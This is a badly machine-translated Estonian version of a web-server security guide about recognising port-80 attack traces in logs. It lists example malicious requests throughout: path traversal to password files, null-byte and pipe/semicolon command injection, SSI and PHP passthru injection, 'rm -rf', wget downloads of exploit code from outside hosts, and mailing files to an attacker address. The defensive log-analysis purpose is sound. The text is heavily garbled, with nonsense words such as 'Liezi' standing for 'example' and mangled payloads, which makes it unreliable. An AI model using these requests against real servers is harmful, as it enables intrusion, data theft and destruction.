I. Kokkuvõte
II. Üksikasjalik kirjeldus
III. Edasine
IV. Kõrvalmõju analüüs
V. transkodeerida
VI. Järeldus
[Kokkuvõte]
kodulehel 80 vaikimisi teenuse port, selle eri turvalisuse probleeme vabastatakse, mõned neist lünkadest isegi ära võita administraatoriõigusi Jinru saidi jooksul, järgmised umbes 80 sadama Zenomorph jälgi rünnakud uurimis-, ja öelda teile, kuidas leida probleemide samamoodi arvestust.
[Detailid]
Siin osaliselt mitmete Lie Zi, väljapaneku veebiserver ja selle kohaldamise kohta üldist rünnakut ja selle jälgi, mis moodustavad vaid Liezi tugev rünnak ja kõik vormis rünnak ei ole nimekirjas, käesolevas paragrahvis üksikasjalik kirjeldus rolli iga rünnak, ja selle, kuidas kasutada nimetatud turvaaukude rünnak.
(1) "." ".." Ja "..." taotluse
Jäljed need rünnakud on väga levinud veebirakendusi ja veebiserver, mis oli ründajal lubada või uss-viirus programmi muuta veebiserver teed, et saada juurdepääs suletud territooriumitele. Enamik CGI programmide nimetatud kitsaskohtadest, ".." soovile.
Näide:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
See näitab, et ründaja Liezi taotluse mosd seda faili, kui ründaja võime läbimurre veebiserveri juurkataloog, siis saada rohkem teavet ning saada täiendavad privileegid.
(2) "% 20" taotlus
% 20 on hex väärtus 16 ruumid, kuigi see ei tähenda, võite kasutada midagi, kuid kui vaatate logi leiavad selle, mõned web server töötab see märk on võimalik tõhusalt rakendada Seetõttu tuleb alati hoolikalt läbi vaadata samamoodi. Teiselt poolt, taotluse võib mõnikord aidata täita mõningaid käsklusi.
Näide:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
See Liezi näitab ründaja täita unix käsk, loetledes terve kataloogi nõutud dokumente, põhjustades ründaja juurdepääsu olulised failid teie süsteemi, mis aitab tal edasi anda saamise tingimused privileege.
(3) "% 00" taotluse
% 00 ütles 16-baidist kuueteistkümnendsüsteemis tühi, ta suutis loll veebirakenduse ning taotleda erinevaid faile.
Näited:
http://host/cgi-bin/lame.cgi?page=index.html
See võib olla kehtiv taotluse masin, kui ründaja teab seda avaldust oli edukas, siis ta edasi otsima cgi korda.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Võibolla cgi programmi ei nõustu seda taotlust, sest see on kontrollida taotluse faili nimi sufiksid, nagu näiteks: html.shtml või muud tüüpi faile. Enamik programme ütlen teile nõutud faili tüüp ei sobi, seekord ta ütleb ründaja taotlused fail peab olema iseloomu failitüüp lõpuosa, nii ründaja võite süsteemi suunas, faili nimi, mille tulemusena Teie süsteemi rohkem tundliku teabe
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Tähelepanu sellele taotlusele, siis petavad cgi programmi, mis selle dokumendi eesmärk on kindlaks määrata aktsepteeritav failitüüpe, mõned rakendused tõhusa kontrolli nii rumal taotlustoimiku, mis on üldlevinud meetodeid ründaja.
(4) "|" taotluse
See on toru märk, et unix süsteemi abipalve rakendamisel mitu süsteemi käske samal ajal.
Näide:
# Kass access_log | grep-i ".."
(See käsk kuvab logi sisse ".." taotlus, mida tavaliselt kasutatakse rünnakute ja ussid leitud)
Sageli leiavad, et paljud veebirakendused kasutavad seda laadi, selle viib ka valehäireid on IDS kajakad.
In hoolikat uurimist teie taotluse, seega ära vähendades valehäirete aastal sissetungimise avastamise süsteemid.
Siin on mõned Lieh-tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
See palve käsku, järgmised on mõned muutused Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc |
See taotlus on loetletud Unix / etc kataloogi kõik failid
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20-i% 20 "lame"
Kassi käsu täitmise taotluse ja rakendamise grep käsu ka, vaadake "lame"
(5) ";" taotluse
UNIX süsteeme, see märk võimaldab mitu käsurea täitmine
Näide:
# Id; uname-
(Rakendamine id käsk, millele järgneb rakendamise uname käsk)
Mõned Web programmi selle iseloomu, võib põhjustada teie IDS logib hoiatus ei õnnestu, tuleb alati hoolikalt kontrollida veebi programmi, nii et teil vähendada pankrotiohule IDS teateid.
(6) " " ja " " taotluse
Kui vaadata oma logisid salvestada kaks märki, mitmel põhjusel, millest esimene on märk, mis lisatakse andmetele dokumendi
Näide 1:
# Echo "Teie hax0red h0 h0" / etc / motd (motd taotleda kirjalikku teavet käesolevas dokumendis)
Ründaja saab hõlpsalt kasutada taotluse eespool omavoliline oma veebilehele. Nagu kuulsa RDS ära ründaja kasutatakse sageli muuta veebilehel.
Näide 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html siis märkate, et keele märkide siin ta ka kulutatud " "," " tähtedega selliseid rünnakuid ei põhjusta ründaja juurdepääsu süsteemi, segaduses inimesed arvavad, et see on õigustatud WWW teave (mis viib Inimesed külasta seda linki külastada ründaja määrata aadressi, see võib taotluse kodeeritakse 16 hex tähemärki vormis, et jälgi rünnak ei ole nii silmatorkav)
(7) "!" Taotlus
Ühise keele antud sümboli taotluse SS (Server Side Include) Ma rünnata, kui ründaja on ründaja segadusse kasutaja klõpsab lingil määratud ning sama nagu eespool kirjeldatud.
Näide:
http://host1/something.php =
Lieh-tzu on ründaja võib seda faili saidil host2 alates host1 näib eespool (muidugi nõuavad külastajad külastada hyökkääjän seaded. Kõnealune taotlus võib ümber kujundada 16 hex kodeering mask, pole lihtne leida)
Samal ajal on see lähenemine võib ka käsu asutuse veebilehel
Näide:
http://host/something.php =
Lieh-sõitma kaugjuhtimissüsteemist "id" käsk, siis ilmuvad veebilehel kasutaja id, enamasti "keegi" või "www"
Käesolev vorm võimaldab ka lisada peidetud faile.
Näide:
http://host/something.php =
Peidetud failid. Htpasswd ei kuvata, Apache keelduvad selliste eeskirjade kehtestamiseks, et. Ht taotluse vorm ja SSI logo möödub selliseid piiranguid ja viia turvaprobleeme
(8) "," Soov
Sellised rünnakud kasutada püüda programm serveri lisamiseks PHP veebirakenduse korda, siis võib lubada käsu puhul, mis sõltub serveri seaded ja muud tegurid tööl Yi Xie (比如 php on seatud turvarežiim)
Näide: http://host/something.php = passthru ("id ");?
Mõnes lihtsa php taotlus, võib ta olla veebilehekülg, kaugjuhtimissüsteemist kasutajate õigusi teostada kohalike käsk
(9) "" "taotlus
See täht hiljem kasutada täitma käsklusi Perl, tähemärki veebirakenduse sageli ei kasutata, nii et kui te näete seda oma samamoodi, peaksid olema väga ettevaatlikud
Näide:
http://host/something.cgi = `id"
Kirjutage perl cgi programmi küsimus viiks rakendamise id käsk
[Lisa]
Järgmises osas rakendamist arutav rohkem rünnakuid võiks käsk koos nõutud dokumente, ja kui sul on serveri käsu täitmise viga, siis tuleb kuidas kontrollida avastus. See osa on ainult teile hea idee, ja ütle oma süsteemi, mis juhtub, ründajad üritavad rünnata teie süsteemi jälgi, kuid ei loetleda kõik ründaja kasutada käskude ja nõudmistega.
"/ Bin / ls"
See käsk nõuab kogu tee, et paljudel veebirakendused on see seaduselünk, kui sa samamoodi paljudes kohtades selline taotlus on võimalik suurte kaugkäivitamist käsk haavatavust, kuid mitte tingimata probleem Samuti võib valehäire. Taas meenutas, veebirakenduse kirjalik (cgi, asp, php ... jne) on aluseks turvalisuse
Näide:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"S Cmd.exe"
See on aknad kest, kui ründaja juurdepääsu ja selle käivitada skripti serveri seadete tingimustel lubatud aknad masin ei saa midagi teha, palju uss viirus läbi 80 sadamates levinud Etäkone
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
See on kahe binaarfailidega, selle probleeme ja / bin / ls, meeldib, kui te samamoodi paljudes kohtades selline taotlus on võimalik suurte kaugkäivitamist käsk haavatavust, kuid mitte tingimata probleem Samuti võib valehäire.
See näitab, milline osa kuulub mis kasutaja ja grupp
Näide:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
See käsk ei kustuta faile, ilma õige kasutamine on väga ohtlik
Näited:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf% 20 * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *;
"Wget ja tftp" käsk
Need käsud on sageli ründaja võib teenida täiendavad privileegid laadida faile, wget on unix käsk alusel, võib kasutada lae tagauksed, tftp on alluvad unix ja NT, kasutatakse faili alla laadida. Mõned IIS usside leviku end tftp kopeerida viiruse teiste masinatega
Näited:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// vastuvõtva / cgi-bin / bad.cgi? DOH = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Kass" käsk
Seda käsku kasutatakse, et vaadata faili sisu, mida lugeda olulist informatsiooni, nagu konfiguratsioonifailid, parooli faile, krediidi failide ja dokumentide suudate välja mõelda
Näited: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? DOH = kass% 20/etc/motd;
"Echo" käsk
See käsk kirjutamiseks kasutatakse andmete faili, näiteks "index.html"
Näited: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-# kiivid% 20was% 20here"% 20 % 200day.txt | http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-# kiivid% 20was% 20here"% 20 % 200day.txt;
"PS" käsk
Nimekirjad praegu käimas protsess, rääkige ründaja et kaughostiga töötab tarkvara, et saada mingi ettekujutus julgeolekuküsimustele, hankida täiendavaid lube
Näited: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? DOH = ps% 20-aux;
"Kill ja killall" käsk
Unix süsteeme, et tappa seda protsessi, ründaja saab kasutada seda käsku stop süsteemi teenuste ja protsesside saab ka kustutada jälgi ründaja mõned ära hakkab tootma palju laps protsesside
Näited: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname" käsk
See käsk ütleb ründaja Etäkone nimi, mõnda aega, kas selle veebisaidi kaudu, et teada, mis ISP, ründaja võib külastada täna. Uname-taotleda üldjuhul need kajastatakse logifail
Näited: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-| http://host/cgi-bin/bad. cgi? DOH = uname% 20-;
"Cc, gcc, Perl, Python jne ..." koostamist / tõlgendamise käsk
Ründaja kaudu wget või tftp lae ära ja kasutada cc, gcc kompilaator kompileerida seda arvesse käivitatava ja edasi juurdepääsuõiguste
Näited: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? DOH = gcc% 20Phantasmp.c;. / a.out% 20-p% 2031337;
Kui vaatate palgid leitud "Perl" python "Need juhised võivad olla serveri ründaja laadida Perl, Python skript, ning püüdis saada privileege kohalike
"Mail" käsk
Ründajad kasutavad sageli see juhtimissüsteem mõned olulised dokumendid ründaja enda postkasti, vaid ka valmis e-post pommirünnakud viiakse läbi
Näited: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh jne ..." ja teised käsud
Unix süsteemide et võimaldada neil muuta failiõigusi
Chown = võimaldab seada faili omanik chmod = võimaldab määrata failiõigusi chgrp = võimaldab omanikul muuta grupiõigustega faile chsh = lubatud muuta kasutaja shell
Näited: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? DOH = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" file
See on süsteem salasõna faili, tavaliselt varju ära, ning ei võimalda näha krüptitud parooli, kuid ründaja, saab teada, mis on kehtiv kasutaja ja süsteemi absoluutne tee, saidi nimi ja muu teave, nagu tavaliselt poolt vari maha, nii ründaja tavaliselt vt / etc / shadow faili
"/ Etc / master.passwd"
See fail on BSD süsteemi salasõna fail, mis sisaldab krüptitud parooli, faili root konto on vaid read-only, ja mõned kvalifitseerimata ründajad avas oma üritavad sisu lugemiseks sees. "Kui veebileht on administraatoriõigusi joosta, siis ründaja ei saa me lugeda sisu sees, palju probleeme süsteemiadministraator tulevad üksteise järel
"/ Etc / shadow"
Sisaldab parooli krüpteeritud süsteemi, loe samapalju juure võtta, ja / et / master.passwd peaaegu
"/ Etc / motd"
Kui kasutajad logige unix süsteemi teabe põhjal tundub, "Sõnum Päeva" file, see annab olulise informatsiooni süsteemist ja administraator kasutajate mõned määrata kasutajad, kes tahavad näha neid, kes ei ole, sisaldab ka süsteemi versiooni teabe ründaja tavaliselt vaata seda pilti, et mõista, mis süsteem töötab ründaja, järgmiseks sammuks on otsida seda tüüpi süsteemi, kasutada ja edasi juurdepääsu süsteemi privileegid
"/ Etc / hosts"
Dokument annab ip aadressi ja võrgu teavet, ründaja Lisateavet süsteem võrgustik
"/ Usr / local / apache / conf / httpd.conf"
See on Apache veebiserveri konfiguratsioonifaili, ründaja saan aru, nagu cgi, ssi ja muu teave on kättesaadav
"/ Etc / inetd.conf"
See on konfiguratsioonifaili inetd teenust, ründaja saab õppida Etäkone, alustage nende teenuste, kas kasutada ümbrisleht juurdepääsu kontrolli, kui ümbris leiti sõit ründaja Järgmine samm on vaadata "/ etc / hosts.allow" ja "/ etc / hosts.deny" fail ja mis võivad muuta mõned seaded, juurdepääsuõiguste
". Htpasswd. Htaccess ja. Htgroup"
Need failid on tavaliselt kasutatakse veebilehe kasutajate autentimise, ründaja oleks vaadata neid faile ja saada kasutajanimi ja parool, parooli faili. Htpasswd on krüpteeritud, murda läbi mõned lihtsad dekodeerimiseks protsessi ründajal lubada lehele sisenemiseks kaitsealad (tavaliselt kasutaja sama kasutajanime ja parooli, et ründaja võib isegi külastada teiste arvel)
"Access_log ja error_log"
Need on apache serveri logi faile, ründajad tihti vaadata neid faile, vaadata need taotlused registreeritakse need ja muud taotlused erinevates kohtades
Tavaliselt ründaja, kes muudab need logifailid, nagu omal aadressi ründaja 80 port Tupo teie ja teie varusüsteem, samuti ei teosta tööd ei ole muud arvestuskord dokumendisüsteemi olukord, mis Jiang Shi sissetungimise avastamise muutub väga raske töö
"[Drive-kirja]: winntrepairsam._ või [draivitähel]: winntrepairsam"
Windows NT süsteemi salasõna faili, kui serveri käsuga ei saa rakendada, ründajad on tavaliselt taotleda, et kõnealused dokumendid, siis "l0pht crack" liigi parooli krakkimisel tööriistad crack, kui ründaja üritab rünnata administraatori parooli faili, kui edukas siis Etäkone saab ründaja saab kontrollida
[Ülevooluava analüüs]
Käesolevas artiklis ma ei ütle, liiga palju ülevoolu teema, ma annan, mida nende nähtuste ja jälgi märkimisväärsest ja murettekitavatele puhvrit sageli rünnanud ründaja koodi muundamise ja raske leida muid viise, et saavutada
Siin on lihtne Lie Zi
Näide: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
See Liezi näitab ründaja kohta avalduse saata palju iseloomu, et katsetada programmi buffer overflow, buffer overflow võite serveri käsu täitmise vastuvõtva õigusi, kui omanik on setuid ja korra juure kaudu ülevoolu, võite juurdepääs kogu süsteemi, kui ei meeldi setuid programmi, siis overflow on ainult jooksvate veebilehekülje kasutajate õigusi
Siin ei saa öelda kõiki asjaolusid, kuid peaksite regulaarselt kontrollima oma logifaili, kui see päev äkki avastatud palju taotlusi, kuid tavaliselt mitte rohkem kui taotluse, tähendab see, te olete läbinud ülevoolu rünnakud, muidugi võib ka uue võrgu uss rünnak
[Transkodeerida]
Kõik rünnakud eespool nimetatud taotlust, ründaja tavaliselt teab IDS süsteemid sageli mehaanilise vaadata taotlus, tavaliselt ründaja kasutab andmete konverteerimise vahend konverteerimiseks taotluse sisu-vormingus 16 bändi, mille tulemusena IDS ignoreerib neid taotlusi, Tunneme CGI haavatavuse skaneerimisseadet, mis on hea Liezi noatera. Kui vaatate logi ajal leiti suur hulk 16-bänd ja mitte mingi ühise märgi, siis ründaja võib üritada kasutada mõningaid võimalusi rünnata teie süsteemi
Kiire viis on lokitiedostosi taotlust neist 16 hex, kopeeri see brauseri brauser võimalik muuta õigus taotleda, ning kuvatakse sisu taotlusel, kui te ei julgust võtta seda riski, lihtne mees ASCII, annavad teile õige koodi.
[Kokkuvõte]
Artiklit ei saa hõlmata kõiki 80 sadamaid rünnata, kuid enamik on viidatud üle üldine rünnak, ja öelda teile, kuidas kontrollida oma logifaile, ja kuidas lisada, nagu mitmed IDS eeskirjad, kirjutage tema eesmärk on web süsteemiadministraator tuleks mures, mis hea idee samal ajal, ma loodan, et see artikkel aitab veebi programmi veebiarendajad kirjutama paremaid programme
Märkuse: Kui teil on mingeid märkusi ja ettepanekuid, siis palun saatke e-mail admin@cgisecurity.com.